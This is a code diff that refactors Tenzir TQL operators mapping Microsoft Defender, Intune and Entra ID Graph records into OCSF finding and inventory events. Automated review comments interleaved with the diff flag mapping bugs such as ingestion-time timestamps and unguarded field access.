+$event.ocsf.time = now()
diff --git a/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql b/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql
index 03cd1f4..feed73a 100644
--- a/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql
+++ b/microsoft/operators/graph/ocsf/events/compliance_policy_setting_state_summary.tql
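Review bot: `$event.ocsf.time = now()` stamps the OCSF event time with the pipeline's wall clock at mapping time, so for any record that keeps the base default, `time` reflects ingestion rather than occurrence; the same `now()` is used in compliance_policy_setting_state_summary.tql and detected_app.tql. That distinction matters for timeline reconstruction during an investigation, so the intent should be stated, e.g. `// No source timestamp: time is the mapping time, not when the activity happened.` above the assignment. The class-specific mappers in this patch overwrite `time` from Graph timestamps where one exists, so a note that the base value is a fallback only would complete the contract, assuming base runs before them.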
@@ -1,43 +1,48 @@
 ---
 description: Microsoft Intune compliance summary → OCSF Compliance Finding (2003)
+args:
+ named:
+ - name: event
+ description: The working event to map.
+ type: field
 ---
 @name = "ocsf.compliance_finding"
-ocsf.metadata.product.name = "Microsoft Intune"
-ocsf.metadata.log_name = "deviceManagement/deviceCompliancePolicySettingStateSummaries"
-ocsf.metadata.profiles = ["cloud", "security_control"]
-
-ocsf.category_uid = 2
-ocsf.class_uid = 2003
-ocsf.activity_id = 1 // Create
-ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id
-ocsf.time = now()
-
-ocsf.severity_id = 1
-ocsf.status_id = 4
-if graph.nonCompliantDeviceCount > 0 or graph.errorDeviceCount > 0 {
- ocsf.severity_id = 3
- ocsf.status_id = 1
+$event.ocsf.metadata.product.name = "Microsoft Intune"
+$event.ocsf.metadata.log_name = "deviceManagement/deviceCompliancePolicySettingStateSummaries"
+$event.ocsf.metadata.profiles = ["cloud", "security_control"]
+
+$event.ocsf.category_uid = 2
+$event.ocsf.class_uid = 2003
+$event.ocsf.activity_id = 1 // Create
+$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id
+$event.ocsf.time = now()
+
+$event.ocsf.severity_id = 1
+$event.ocsf.status_id = 4
+if $event.graph.nonCompliantDeviceCount > 0 or $event.graph.errorDeviceCount > 0 {
+ $event.ocsf.severity_id = 3
+ $event.ocsf.status_id = 1
 }
-ocsf.finding_info = {
- uid: ocsf.metadata.original_event_uid,
- title: move graph.settingName?,
- desc: move graph.setting?,
+$event.ocsf.finding_info = {
+ uid: $event.ocsf.metadata.original_event_uid,
+ title: move $event.graph.settingName?,
+ desc: move $event.graph.setting?,
 }
-ocsf.compliance = {
- control: ocsf.finding_info.title,
+$event.ocsf.compliance = {
+ control: $event.ocsf.finding_info.title,
 status_id: 1,
 }
-if ocsf.severity_id == 3 {
- ocsf.compliance.status_id = 3
+if $event.ocsf.severity_id == 3 {
+ $event.ocsf.compliance.status_id = 3
 }
-ocsf.resources = [{
+$event.ocsf.resources = [{
 name: "Microsoft Intune managed devices",
- type: move graph.platformType?,
+ type: move $event.graph.platformType?,
 role_id: 1,
 }]
diff --git a/microsoft/operators/graph/ocsf/events/defender_alert.tql b/microsoft/operators/graph/ocsf/events/defender_alert.tql
index 7d79bbf..ae83654 100644
--- a/microsoft/operators/graph/ocsf/events/defender_alert.tql
+++ b/microsoft/operators/graph/ocsf/events/defender_alert.tql
@@ -1,19 +1,24 @@
 ---
 description: Microsoft Defender alert → OCSF Detection Finding (2004)
+args:
+ named:
+ - name: event
+ description: The working event to map.
+ type: field
 ---
 @name = "ocsf.detection_finding"
-ocsf.metadata.product.name = "Microsoft Defender"
-ocsf.metadata.log_name = "security/alerts_v2"
-ocsf.metadata.profiles = ["cloud", "incident", "security_control"]
+$event.ocsf.metadata.product.name = "Microsoft Defender"
+$event.ocsf.metadata.log_name = "security/alerts_v2"
+$event.ocsf.metadata.profiles = ["cloud", "incident", "security_control"]
-ocsf.category_uid = 2
-ocsf.class_uid = 2004
-ocsf.activity_id = 1 // Create
-ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id
-ocsf.time = time(move graph.createdDateTime)
-ocsf.end_time = time(move graph.lastUpdateDateTime?)
+$event.ocsf.category_uid = 2
+$event.ocsf.class_uid = 2004
+$event.ocsf.activity_id = 1 // Create
+$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id
+$event.ocsf.time = time(move $event.graph.createdDateTime)
+$event.ocsf.end_time = time(move $event.graph.lastUpdateDateTime?)
 let $severities = {
 informational: 1,
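Review bot: The condition `if $event.graph.nonCompliantDeviceCount > 0 or $event.graph.errorDeviceCount > 0` dereferences both counts without the `?` used for every other Graph field in this file, so a summary record missing either count would abort the mapping instead of staying on the compliant/informational defaults set just above. Reading them optionally, `if $event.graph.nonCompliantDeviceCount? > 0 or $event.graph.errorDeviceCount? > 0 {`, keeps the operator total, provided a comparison against null evaluates to false rather than erroring in TQL, which cannot be confirmed from this hunk. The `severity_id = 3` / `status_id = 1` pair and the later `compliance.status_id = 3` all hinge on this one condition, so a comment naming it once ("any non-compliant or errored device turns the finding into a Fail") would make the three assignments easier to audit together.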
@@ -21,17 +26,17 @@ let $severities = {
 medium: 3,
 high: 4,
 }
-ocsf.severity_id = $severities[graph.severity]? else 0
-drop graph.severity?
+$event.ocsf.severity_id = $severities[$event.graph.severity]? else 0
+drop $event.graph.severity?
 let $statuses = {
 new: 1,
 inProgress: 2,
 resolved: 4,
 }
-ocsf.status_id = $statuses[graph.status]?
-if ocsf.status_id != null {
- drop graph.status?
+$event.ocsf.status_id = $statuses[$event.graph.status]?
+if $event.ocsf.status_id != null {
+ drop $event.graph.status?
 }
 let $verdicts = {
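Review bot: `drop $event.graph.severity?` runs unconditionally after `severity_id = $severities[...]? else 0`, so a severity string that is not in the table is mapped to 0 (Unknown) and the original value is then discarded, whereas `status` a few lines down is only dropped when it mapped; a severity from a newer Graph enum value is therefore lost from the residue. Guarding the drop the same way, `if $event.ocsf.severity_id != 0 { drop $event.graph.severity? }`, keeps the raw value available for triage. The severity hunk of defender_incident.tql has the same asymmetry.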
@@ -40,61 +45,61 @@ let $verdicts = {
 truePositive: 2,
 informationalExpectedActivity: 5,
 }
-ocsf.verdict_id = $verdicts[graph.classification?]?
-if ocsf.verdict_id != null {
- drop graph.classification?
+$event.ocsf.verdict_id = $verdicts[$event.graph.classification?]?
+if $event.ocsf.verdict_id != null {
+ drop $event.graph.classification?
 }
-match graph.determination {
+match $event.graph.determination {
 "unknown" | "unknownFutureValue" => {}
- _ if graph.determination? != null => {
- graph._finding_types = {
- types: [move graph.determination],
+ _ if $event.graph.determination? != null => {
+ $event.graph._finding_types = {
+ types: [move $event.graph.determination],
 }
 }
 _ => {}
 }
-ocsf.finding_info = {
- uid: ocsf.metadata.original_event_uid,
- uid_alt: move graph.providerAlertId?,
- title: move graph.title?,
- desc: move graph.description?,
- modified_time: ocsf.end_time,
+$event.ocsf.finding_info = {
+ uid: $event.ocsf.metadata.original_event_uid,
+ uid_alt: move $event.graph.providerAlertId?,
+ title: move $event.graph.title?,
+ desc: move $event.graph.description?,
+ modified_time: $event.ocsf.end_time,
 product: {
- name: move graph.serviceSource?,
+ name: move $event.graph.serviceSource?,
 vendor_name: "Microsoft",
 feature: {
- name: move graph.detectionSource?,
+ name: move $event.graph.detectionSource?,
 },
 },
 related_events: [{
- uid: move graph.incidentId?,
+ uid: move $event.graph.incidentId?,
 }],
- ...move graph._finding_types?,
+ ...move $event.graph._finding_types?,
 }
-if graph.detectorId? != null {
- ocsf.finding_info.analytic = {
- uid: move graph.detectorId,
+if $event.graph.detectorId? != null {
+ $event.ocsf.finding_info.analytic = {
+ uid: move $event.graph.detectorId,
 type_id: 0,
 }
 }
-if graph.mitreTechniques? != null {
- ocsf.attacks = graph.mitreTechniques.map(t => {
+if $event.graph.mitreTechniques? != null {
+ $event.ocsf.attacks = $event.graph.mitreTechniques.map(t => {
 technique: {
 uid: t,
 },
 })
- drop graph.mitreTechniques
+ drop $event.graph.mitreTechniques
 }
-if graph.evidence? != null {
- ocsf.evidences = graph.evidence.map(e => {
+if $event.graph.evidence? != null {
+ $event.ocsf.evidences = $event.graph.evidence.map(e => {
 name: e["@odata.type"]?,
 data: e,
 })
- drop graph.evidence
+ drop $event.graph.evidence
 }
-ocsf.is_alert = true
+$event.ocsf.is_alert = true
diff --git a/microsoft/operators/graph/ocsf/events/defender_incident.tql b/microsoft/operators/graph/ocsf/events/defender_incident.tql
index df8ac70..7da3690 100644
--- a/microsoft/operators/graph/ocsf/events/defender_incident.tql
+++ b/microsoft/operators/graph/ocsf/events/defender_incident.tql
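Review bot: `related_events: [{ uid: move $event.graph.incidentId?, }]` inside the `finding_info` literal is built unconditionally, so an alert that is not attached to an incident emits a one-element list holding `{uid: null}` instead of omitting `related_events`, and any consumer counting related events sees a phantom entry. Guarding it the way `analytic` is guarded a few lines below fixes that; the rewritten lines are shown in the fence. `evidences` keeps the unmodified Graph evidence object under `data`, which is useful for triage but carries whatever personal data the evidence contained, so a comment stating that `data` is the raw source object would set expectations for downstream retention.
```tql
$event.ocsf.finding_info = {
  // … unchanged: uid, uid_alt, title, desc, modified_time, product …
  ...move $event.graph._finding_types?,
}
if $event.graph.incidentId? != null {
  $event.ocsf.finding_info.related_events = [{
    uid: move $event.graph.incidentId,
  }]
}
// … unchanged: analytic, attacks, evidences, is_alert …
```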
@@ -1,49 +1,54 @@
 ---
 description: Microsoft Defender incident → OCSF Incident Finding (2005)
+args:
+ named:
+ - name: event
+ description: The working event to map.
+ type: field
 ---
 @name = "ocsf.incident_finding"
-ocsf.metadata.product.name = "Microsoft Defender"
-ocsf.metadata.log_name = "security/incidents"
-ocsf.metadata.profiles = ["cloud", "incident", "security_control"]
+$event.ocsf.metadata.product.name = "Microsoft Defender"
+$event.ocsf.metadata.log_name = "security/incidents"
+$event.ocsf.metadata.profiles = ["cloud", "incident", "security_control"]
-ocsf.category_uid = 2
-ocsf.class_uid = 2005
-ocsf.time = time(move graph.createdDateTime)
-ocsf.end_time = time(move graph.lastUpdateDateTime?)
+$event.ocsf.category_uid = 2
+$event.ocsf.class_uid = 2005
+$event.ocsf.time = time(move $event.graph.createdDateTime)
+$event.ocsf.end_time = time(move $event.graph.lastUpdateDateTime?)
-match graph.status {
+match $event.graph.status {
 "active" | "new" => {
- ocsf.status_id = 1
+ $event.ocsf.status_id = 1
 }
 "inProgress" => {
- ocsf.status_id = 2
+ $event.ocsf.status_id = 2
 }
 "resolved" => {
- ocsf.status_id = 4
+ $event.ocsf.status_id = 4
 }
 "redirected" => {
- ocsf.status_id = 5
+ $event.ocsf.status_id = 5
 }
 _ => {
- ocsf.status_id = 1
+ $event.ocsf.status_id = 1
 }
 }
-drop graph.status?
+drop $event.graph.status?
-match ocsf.status_id {
+match $event.ocsf.status_id {
 4 | 5 => {
- ocsf.activity_id = 3 // Close
+ $event.ocsf.activity_id = 3 // Close
 }
- _ if ocsf.end_time != null and ocsf.end_time != ocsf.time => {
- ocsf.activity_id = 2 // Update
+ _ if $event.ocsf.end_time != null and $event.ocsf.end_time != $event.ocsf.time => {
+ $event.ocsf.activity_id = 2 // Update
 }
 _ => {
- ocsf.activity_id = 1 // Create
+ $event.ocsf.activity_id = 1 // Create
 }
 }
-ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id
+$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id
 let $severities = {
 informational: 1,
@@ -51,73 +56,73 @@ let $severities = {
 medium: 3,
 high: 4,
 }
-ocsf.severity_id = $severities[graph.severity]? else 0
-drop graph.severity?
+$event.ocsf.severity_id = $severities[$event.graph.severity]? else 0
+drop $event.graph.severity?
-if graph.priorityScore? != null {
- ocsf.risk_score = move graph.priorityScore
- ocsf.priority_id = 1
- if ocsf.risk_score >= 15 {
- ocsf.priority_id = 2
+if $event.graph.priorityScore? != null {
+ $event.ocsf.risk_score = move $event.graph.priorityScore
+ $event.ocsf.priority_id = 1
+ if $event.ocsf.risk_score >= 15 {
+ $event.ocsf.priority_id = 2
 }
- if ocsf.risk_score > 85 {
- ocsf.priority_id = 4
+ if $event.ocsf.risk_score > 85 {
+ $event.ocsf.priority_id = 4
 }
 }
-if graph.customTags? != null or graph.systemTags? != null {
- ocsf.metadata.labels = [
- ...move graph.customTags?,
- ...move graph.systemTags?,
+if $event.graph.customTags? != null or $event.graph.systemTags? != null {
+ $event.ocsf.metadata.labels = [
+ ...move $event.graph.customTags?,
+ ...move $event.graph.systemTags?,
 ]
- if ocsf.metadata.labels.length() == 0 {
- drop ocsf.metadata.labels
+ if $event.ocsf.metadata.labels.length() == 0 {
+ drop $event.ocsf.metadata.labels
 }
 }
-match graph.determination {
+match $event.graph.determination {
 "unknown" | "unknownFutureValue" => {}
- _ if graph.determination? != null => {
- graph._finding_types = {
- types: [move graph.determination],
+ _ if $event.graph.determination? != null => {
+ $event.graph._finding_types = {
+ types: [move $event.graph.determination],
 }
 }
 _ => {}
 }
-if graph.redirectIncidentId? != null {
- graph._related_events = {
+if $event.graph.redirectIncidentId? != null {
+ $event.graph._related_events = {
 related_events: [{
- uid: move graph.redirectIncidentId,
+ uid: move $event.graph.redirectIncidentId,
 }],
 }
 }
-ocsf.message = move graph.displayName?
-ocsf.desc = move graph.description?
-ocsf.finding_info_list = [
+$event.ocsf.message = move $event.graph.displayName?
+$event.ocsf.desc = move $event.graph.description?
+$event.ocsf.finding_info_list = [
 {
- uid: ocsf.metadata.original_event_uid,
- title: ocsf.message,
- desc: move graph.summary?,
- ...move graph._finding_types?,
- ...move graph._related_events?,
+ uid: $event.ocsf.metadata.original_event_uid,
+ title: $event.ocsf.message,
+ desc: move $event.graph.summary?,
+ ...move $event.graph._finding_types?,
+ ...move $event.graph._related_events?,
 },
 ]
-if graph.alerts? != null {
- ocsf.finding_info_list = [
- ...ocsf.finding_info_list,
- ...graph.alerts.map(a => {
+if $event.graph.alerts? != null {
+ $event.ocsf.finding_info_list = [
+ ...$event.ocsf.finding_info_list,
+ ...$event.graph.alerts.map(a => {
 uid: a.id,
 title: a.title,
 }),
 ]
- drop graph.alerts
+ drop $event.graph.alerts
 }
-if graph.assignedTo? != null {
- ocsf.assignee = {
- name: graph.assignedTo.split("@")[0]?,
- domain: graph.assignedTo.split("@")[1]?,
- email_addr: move graph.assignedTo,
+if $event.graph.assignedTo? != null {
+ $event.ocsf.assignee = {
+ name: $event.graph.assignedTo.split("@")[0]?,
+ domain: $event.graph.assignedTo.split("@")[1]?,
+ email_addr: move $event.graph.assignedTo,
 type_id: 1,
 }
 }
@@ -128,7 +133,7 @@ let $verdicts = {
 truePositive: 2,
 informationalExpectedActivity: 5,
 }
-ocsf.verdict_id = $verdicts[graph.classification?]?
-if ocsf.verdict_id != null {
- drop graph.classification?
+$event.ocsf.verdict_id = $verdicts[$event.graph.classification?]?
+if $event.ocsf.verdict_id != null {
+ drop $event.graph.classification?
 }
diff --git a/microsoft/operators/graph/ocsf/events/detected_app.tql b/microsoft/operators/graph/ocsf/events/detected_app.tql
index fa0a435..f013764 100644
--- a/microsoft/operators/graph/ocsf/events/detected_app.tql
+++ b/microsoft/operators/graph/ocsf/events/detected_app.tql
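Review bot: In `match $event.graph.status` the `_ => { $event.ocsf.status_id = 1 }` arm maps any unrecognised status to New and the following `drop $event.graph.status?` then discards the original string, so a status the table does not know is silently reported as a fresh incident; the `determination` match in this same file treats `unknownFutureValue` explicitly, but `status` does not. Mapping the fallback to 0 (Unknown in OCSF), `_ => { $event.ocsf.status_id = 0 }`, and dropping the raw field only when a known value matched preserves the signal for triage. The `priority_id` thresholds `>= 15` and `> 85` are unexplained magic numbers; a comment saying where the bands come from would help the next reader, and the enclosing hunk starts at the top of the file so the earlier context is visible above.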
@@ -1,35 +1,40 @@ --- description: Microsoft Intune detected app → OCSF Software Inventory Info (5020) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.software_info" -ocsf.metadata.product.name = "Microsoft Intune" -ocsf.metadata.log_name = "deviceManagement/detectedApps" -ocsf.metadata.profiles = ["cloud", "host"] +$event.ocsf.metadata.product.name = "Microsoft Intune" +$event.ocsf.metadata.log_name = "deviceManagement/detectedApps" +$event.ocsf.metadata.profiles = ["cloud", "host"] -ocsf.category_uid = 5 -ocsf.class_uid = 5020 -ocsf.activity_id = 2 // Collect -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.severity_id = 1 -ocsf.time = now() +$event.ocsf.category_uid = 5 +$event.ocsf.class_uid = 5020 +$event.ocsf.activity_id = 2 // Collect +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.severity_id = 1 +$event.ocsf.time = now() -ocsf.package = { - uid: ocsf.metadata.original_event_uid, - name: move graph.displayName, - version: move graph.version, - vendor_name: move graph.publisher?, +$event.ocsf.package = { + uid: $event.ocsf.metadata.original_event_uid, + name: move $event.graph.displayName, + version: move $event.graph.version, + vendor_name: move $event.graph.publisher?, type_id: 1, } -ocsf.product = { - name: ocsf.package.name, - vendor_name: ocsf.package.vendor_name, - version: ocsf.package.version, +$event.ocsf.product = { + name: $event.ocsf.package.name, + vendor_name: $event.ocsf.package.vendor_name, + version: $event.ocsf.package.version, } -ocsf.device = { +$event.ocsf.device = { name: "Microsoft Intune managed devices", type_id: 0, } diff --git a/microsoft/operators/graph/ocsf/events/directory_audit.tql b/microsoft/operators/graph/ocsf/events/directory_audit.tql index fccec0b..01cb4b5 100644 --- a/microsoft/operators/graph/ocsf/events/directory_audit.tql +++ b/microsoft/operators/graph/ocsf/events/directory_audit.tql 
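Review bot: The new `event` argument is documented only as "The working event to map.", which does not tell a caller what shape the field must have: this operator reads `$event.ocsf.metadata.original_event_uid` and writes `$event.ocsf.*` before any of its own assignments, and it consumes `$event.graph.*`, so the record must already carry the `ocsf` and `graph` members that `microsoft::graph::ocsf::map` sets up. A description such as `The working event to map. Must already hold the \`ocsf\` record (with metadata populated) and the \`graph\` source record as prepared by the map operator.` would make the contract explicit. The same one-line description is added in the directory_audit, managed_device, risk_detection, risky_user and sign_in hunks, and in the Windows base, account_change, application_crash_report and application_error hunks, where the source member is `windows` rather than `graph`.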
@@ -1,49 +1,54 @@ --- description: Microsoft Entra ID directory audit log → OCSF IAM activity +args: + named: + - name: event + description: The working event to map. + type: field --- -ocsf.metadata.product.name = "Microsoft Entra ID" -ocsf.metadata.log_name = "auditLogs/directoryAudits" -ocsf.metadata.source = move graph.loggedByService? +$event.ocsf.metadata.product.name = "Microsoft Entra ID" +$event.ocsf.metadata.log_name = "auditLogs/directoryAudits" +$event.ocsf.metadata.source = move $event.graph.loggedByService? -ocsf.category_uid = 3 -ocsf.time = time(move graph.activityDateTime) -ocsf.message = move graph.activityDisplayName? -ocsf.status_detail = move graph.resultReason? +$event.ocsf.category_uid = 3 +$event.ocsf.time = time(move $event.graph.activityDateTime) +$event.ocsf.message = move $event.graph.activityDisplayName? +$event.ocsf.status_detail = move $event.graph.resultReason? let $status_ids = { success: 1, } -ocsf.status_id = $status_ids[graph.result]? else 2 -if ocsf.status_id == 2 { - ocsf.severity_id = 2 +$event.ocsf.status_id = $status_ids[$event.graph.result]? else 2 +if $event.ocsf.status_id == 2 { + $event.ocsf.severity_id = 2 } -drop graph.result? +drop $event.graph.result? -if graph.initiatedBy.user? != null { - ocsf.actor = { +if $event.graph.initiatedBy.user? 
!= null { + $event.ocsf.actor = { user: { - uid: move graph.initiatedBy.user.id?, - name: graph.initiatedBy.user.userPrincipalName?.split("@")[0]?, - domain: graph.initiatedBy.user.userPrincipalName?.split("@")[1]?, - email_addr: move graph.initiatedBy.user.userPrincipalName?, - full_name: move graph.initiatedBy.user.displayName?, + uid: move $event.graph.initiatedBy.user.id?, + name: $event.graph.initiatedBy.user.userPrincipalName?.split("@")[0]?, + domain: $event.graph.initiatedBy.user.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.initiatedBy.user.userPrincipalName?, + full_name: move $event.graph.initiatedBy.user.displayName?, type_id: 1, }, } - ocsf.src_endpoint = { - ip: move graph.initiatedBy.user.ipAddress?, + $event.ocsf.src_endpoint = { + ip: move $event.graph.initiatedBy.user.ipAddress?, } -} else if graph.initiatedBy.app? != null { - ocsf.actor = { - app_name: move graph.initiatedBy.app.displayName?, - app_uid: move graph.initiatedBy.app.appId?, +} else if $event.graph.initiatedBy.app? != null { + $event.ocsf.actor = { + app_name: move $event.graph.initiatedBy.app.displayName?, + app_uid: move $event.graph.initiatedBy.app.appId?, user: { - uid: move graph.initiatedBy.app.servicePrincipalId?, + uid: move $event.graph.initiatedBy.app.servicePrincipalId?, type_id: 4, }, } } -drop graph.initiatedBy? +drop $event.graph.initiatedBy? let $account_activity_ids = { "Add user": 1, 
@@ -60,87 +65,87 @@ let $group_activity_ids = { "Add group": 6, } -match graph.category { +match $event.graph.category { "GroupManagement" => { - graph._ocsf_class = "group_management" + $event.graph._ocsf_class = "group_management" } - "UserManagement" if $group_activity_ids[ocsf.message]? != null => { - graph._ocsf_class = "group_management" + "UserManagement" if $group_activity_ids[$event.ocsf.message]? != null => { + $event.graph._ocsf_class = "group_management" } "UserManagement" => { - graph._ocsf_class = "account_change" + $event.graph._ocsf_class = "account_change" } _ => { - graph._ocsf_class = "entity_management" + $event.graph._ocsf_class = "entity_management" } } -match graph._ocsf_class { +match $event.graph._ocsf_class { "group_management" => { @name = "ocsf.group_management" - ocsf.class_uid = 3006 - ocsf.activity_id = $group_activity_ids[ocsf.message]? else 99 - graph._target_groups = graph.targetResources.where(r => r.Type? == "Group" or r.type? == "Group") - graph._target_users = graph.targetResources.where(r => r.Type? == "User" or r.type? == "User") - ocsf.group = { - uid: graph._target_groups[0]?.id? else graph.targetResources[0]?.id?, - name: graph._target_groups[0]?.displayName? else graph.targetResources[0]?.displayName?, + $event.ocsf.class_uid = 3006 + $event.ocsf.activity_id = $group_activity_ids[$event.ocsf.message]? else 99 + $event.graph._target_groups = $event.graph.targetResources.where(r => r.Type? == "Group" or r.type? == "Group") + $event.graph._target_users = $event.graph.targetResources.where(r => r.Type? == "User" or r.type? == "User") + $event.ocsf.group = { + uid: $event.graph._target_groups[0]?.id? else $event.graph.targetResources[0]?.id?, + name: $event.graph._target_groups[0]?.displayName? else $event.graph.targetResources[0]?.displayName?, } - if graph._target_users[0]? 
!= null { - ocsf.user = { - uid: graph._target_users[0]?.id?, - full_name: graph._target_users[0]?.displayName?, - email_addr: graph._target_users[0]?.userPrincipalName?, + if $event.graph._target_users[0]? != null { + $event.ocsf.user = { + uid: $event.graph._target_users[0]?.id?, + full_name: $event.graph._target_users[0]?.displayName?, + email_addr: $event.graph._target_users[0]?.userPrincipalName?, type_id: 1, } } - drop graph._target_groups? - drop graph._target_users? + drop $event.graph._target_groups? + drop $event.graph._target_users? } "account_change" => { @name = "ocsf.account_change" - ocsf.class_uid = 3001 - ocsf.activity_id = $account_activity_ids[ocsf.message]? else 99 - ocsf.user = { - uid: graph.targetResources[0]?.id?, - full_name: graph.targetResources[0]?.displayName?, + $event.ocsf.class_uid = 3001 + $event.ocsf.activity_id = $account_activity_ids[$event.ocsf.message]? else 99 + $event.ocsf.user = { + uid: $event.graph.targetResources[0]?.id?, + full_name: $event.graph.targetResources[0]?.displayName?, type_id: 1, } } _ => { @name = "ocsf.entity_management" - ocsf.class_uid = 3004 - match graph.operationType { + $event.ocsf.class_uid = 3004 + match $event.graph.operationType { "Add" => { - ocsf.activity_id = 1 + $event.ocsf.activity_id = 1 } "Read" => { - ocsf.activity_id = 2 + $event.ocsf.activity_id = 2 } "Update" => { - ocsf.activity_id = 3 + $event.ocsf.activity_id = 3 } "Delete" => { - ocsf.activity_id = 4 + $event.ocsf.activity_id = 4 } _ => { - ocsf.activity_id = 99 + $event.ocsf.activity_id = 99 } } - ocsf.entity = { - uid: graph.targetResources[0]?.id?, - name: graph.targetResources[0]?.displayName?, + $event.ocsf.entity = { + uid: $event.graph.targetResources[0]?.id?, + name: $event.graph.targetResources[0]?.displayName?, } } } -drop graph._ocsf_class +drop $event.graph._ocsf_class -if ocsf.activity_id == 99 { - ocsf.activity_name = ocsf.message +if $event.ocsf.activity_id == 99 { + $event.ocsf.activity_name = $event.ocsf.message } 
-ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Preserve targetResources in unmapped because modifiedProperties often carry // the security-relevant before/after values. -drop graph.operationType? -drop graph.category? +drop $event.graph.operationType? +drop $event.graph.category? diff --git a/microsoft/operators/graph/ocsf/events/managed_device.tql b/microsoft/operators/graph/ocsf/events/managed_device.tql index a58a5b4..f3bf01f 100644 --- a/microsoft/operators/graph/ocsf/events/managed_device.tql +++ b/microsoft/operators/graph/ocsf/events/managed_device.tql 
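Review bot: In the group_management branch `$event.graph.targetResources.where(r => ...)` is called without the `?` guard, while every other access to the same field in this hunk is written `$event.graph.targetResources[0]?.id?`; an audit record without `targetResources` would therefore warn on the `.where` calls but pass silently through the other branches. Using the optional form the file already uses elsewhere, `$event.graph._target_groups = $event.graph.targetResources?.where(r => r.Type? == "Group" or r.type? == "Group")` (and likewise for `_target_users`), keeps the three branches consistent; whether Graph ever omits the array is something I cannot confirm from the hunk. The activity-id tables that this `match` consults are defined above the hunk.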
@@ -1,70 +1,75 @@ --- description: Microsoft Intune managed device → OCSF Device Inventory Info (5001) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.inventory_info" -ocsf.metadata.product.name = "Microsoft Intune" -ocsf.metadata.log_name = "deviceManagement/managedDevices" -ocsf.metadata.profiles = ["cloud", "host"] +$event.ocsf.metadata.product.name = "Microsoft Intune" +$event.ocsf.metadata.log_name = "deviceManagement/managedDevices" +$event.ocsf.metadata.profiles = ["cloud", "host"] -ocsf.category_uid = 5 -ocsf.class_uid = 5001 -ocsf.activity_id = 2 // Collect -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.lastSyncDateTime) +$event.ocsf.category_uid = 5 +$event.ocsf.class_uid = 5001 +$event.ocsf.activity_id = 2 // Collect +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.lastSyncDateTime) -match graph.complianceState { +match $event.graph.complianceState { "compliant" => { - graph._is_compliant = true - drop graph.complianceState + $event.graph._is_compliant = true + drop $event.graph.complianceState } "noncompliant" | "nonCompliant" => { - graph._is_compliant = false - drop graph.complianceState + $event.graph._is_compliant = false + drop $event.graph.complianceState } _ => {} } -match graph.managedDeviceOwnerType { +match $event.graph.managedDeviceOwnerType { "personal" => { - graph._is_personal = true - drop graph.managedDeviceOwnerType + $event.graph._is_personal = true + drop $event.graph.managedDeviceOwnerType } "company" => { - graph._is_personal = false - drop graph.managedDeviceOwnerType + $event.graph._is_personal = false + drop $event.graph.managedDeviceOwnerType } _ => {} } -ocsf.device = { - uid: ocsf.metadata.original_event_uid, - uid_alt: move graph.azureADDeviceId?, - name: move graph.deviceName?, +$event.ocsf.device = { + uid: $event.ocsf.metadata.original_event_uid, + uid_alt: 
move $event.graph.azureADDeviceId?, + name: move $event.graph.deviceName?, type_id: 0, os: { - name: move graph.operatingSystem?, - version: move graph.osVersion?, + name: move $event.graph.operatingSystem?, + version: move $event.graph.osVersion?, }, - model: move graph.model?, + model: move $event.graph.model?, hw_info: { - vendor_name: move graph.manufacturer?, - serial_number: move graph.serialNumber?, + vendor_name: move $event.graph.manufacturer?, + serial_number: move $event.graph.serialNumber?, }, owner: { - uid: move graph.userId?, - name: graph.userPrincipalName?.split("@")[0]?, - domain: graph.userPrincipalName?.split("@")[1]?, - email_addr: move graph.userPrincipalName?, - full_name: move graph.userDisplayName?, + uid: move $event.graph.userId?, + name: $event.graph.userPrincipalName?.split("@")[0]?, + domain: $event.graph.userPrincipalName?.split("@")[1]?, + email_addr: move $event.graph.userPrincipalName?, + full_name: move $event.graph.userDisplayName?, type_id: 1, }, - is_compliant: move graph._is_compliant?, + is_compliant: move $event.graph._is_compliant?, is_managed: true, - is_personal: move graph._is_personal?, - first_seen_time: time(move graph.enrolledDateTime?), + is_personal: move $event.graph._is_personal?, + first_seen_time: time(move $event.graph.enrolledDateTime?), } -ocsf.device.hostname = ocsf.device.name +$event.ocsf.device.hostname = $event.ocsf.device.name // Intune-specific health attestation, ownership, and management-agent details // stay in unmapped until there is a precise OCSF target. diff --git a/microsoft/operators/graph/ocsf/events/risk_detection.tql b/microsoft/operators/graph/ocsf/events/risk_detection.tql index 4178e88..09b7bed 100644 --- a/microsoft/operators/graph/ocsf/events/risk_detection.tql +++ b/microsoft/operators/graph/ocsf/events/risk_detection.tql 
@@ -1,19 +1,24 @@ --- description: Microsoft Entra ID risk detection → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.metadata.product.name = "Microsoft Entra ID Protection" -ocsf.metadata.log_name = "identityProtection/riskDetections" -ocsf.metadata.profiles = ["cloud", "security_control"] +$event.ocsf.metadata.product.name = "Microsoft Entra ID Protection" +$event.ocsf.metadata.log_name = "identityProtection/riskDetections" +$event.ocsf.metadata.profiles = ["cloud", "security_control"] -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.time = time(move graph.detectedDateTime) -ocsf.end_time = time(move graph.lastUpdatedDateTime?) +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.time = time(move $event.graph.detectedDateTime) 